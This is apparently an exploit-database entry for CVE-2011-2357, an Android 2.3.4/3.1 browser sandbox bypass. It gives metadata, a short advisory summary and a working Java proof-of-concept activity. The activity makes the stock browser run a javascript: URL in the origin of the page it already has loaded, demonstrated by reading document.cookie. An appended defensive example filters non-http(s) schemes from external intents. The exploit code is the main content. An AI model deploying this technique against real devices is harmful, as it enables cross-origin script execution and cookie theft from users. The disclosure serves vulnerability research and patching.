Open Handset Alliance Android 2.3.4/3.1 - Browser Sandbox Security Bypass

Author: Roee Hay
type: remote
platform: multiple
port:
date_added: 2011-08-02
date_updated: 2015-02-07
verified: 1
codes: CVE-2011-2357;OSVDB-74260
tags:
aliases:
screenshot_url:
application_url:

source: https://www.securityfocus.com/bid/48954/info

Open Handset Alliance Android is prone to a vulnerability that may allow attackers to bypass the browser sandbox.

Successful exploits will allow attackers to execute arbitrary script code within the context of an arbitrary domain, i.e. in the origin of whatever page the browser currently has loaded.

Android 2.3.4 and 3.1 are vulnerable; prior versions may also be affected.

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class CasExploit extends Activity
{
   static final String mPackage = "com.android.browser";
   static final String mClass = "BrowserActivity";
   static final String mUrl = "http://target.domain/";
   static final String mJavascript = "alert(document.cookie)";
   static final int mSleep = 15000; // give the browser time to finish loading the page

   @Override
   public void onCreate(Bundle savedInstanceState) {
      super.onCreate(savedInstanceState);
      setContentView(R.layout.main);
      // First VIEW intent: make the stock browser open the target page.
      startBrowserActivity(mUrl);
      try {
         Thread.sleep(mSleep);
      }
      catch (InterruptedException e) {}
      // Second VIEW intent carries a javascript: URL; the unpatched browser
      // executes it in the origin of the page it already has open.
      startBrowserActivity("javascript:" + mJavascript);
   }

   private void startBrowserActivity(String url) {
      Intent res = new Intent("android.intent.action.VIEW");
      res.setComponent(new ComponentName(mPackage, mPackage + "." + mClass));
      res.setData(Uri.parse(url));
      startActivity(res);
   }
}
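For contrast, an added illustration (not part of this advisory and not the Android browser's own code) of the scheme check a WebView-hosting activity can apply to VIEW intents arriving from other apps, so that a javascript: URL delivered by intent is dropped instead of being run in the origin of the page already loaded; the class, method and log tag names are hypothetical.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;
import android.webkit.WebView;

import java.util.Locale;

// Hypothetical hardened viewer activity (added illustration, not Android's own code).
public class HardenedViewerActivity extends Activity {
    private static final String TAG = "HardenedViewer";
    private WebView mWebView;

    // Only network schemes are accepted from other applications. Anything else,
    // in particular "javascript:", would execute in the origin of whatever page
    // the WebView currently has open rather than navigate to a new origin.
    static boolean isAllowedExternalUrl(Uri uri) {
        if (uri == null || uri.getScheme() == null) return false;
        String scheme = uri.getScheme().trim().toLowerCase(Locale.ROOT);
        return scheme.equals("http") || scheme.equals("https");
    }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        mWebView = new WebView(this);
        setContentView(mWebView);
        handleViewIntent(getIntent());
    }

    @Override
    protected void onNewIntent(Intent intent) {
        super.onNewIntent(intent);
        // A second delivery to an already-running instance (the situation the
        // advisory's second VIEW intent relies on) goes through the same filter.
        handleViewIntent(intent);
    }

    private void handleViewIntent(Intent intent) {
        if (intent == null || !Intent.ACTION_VIEW.equals(intent.getAction())) return;
        Uri data = intent.getData();
        if (!isAllowedExternalUrl(data)) {
            // Refuse the request and leave a record for detection/triage.
            Log.w(TAG, "Rejected non-http(s) URL from external intent: " + data);
            return;
        }
        mWebView.loadUrl(data.toString());
    }
}
```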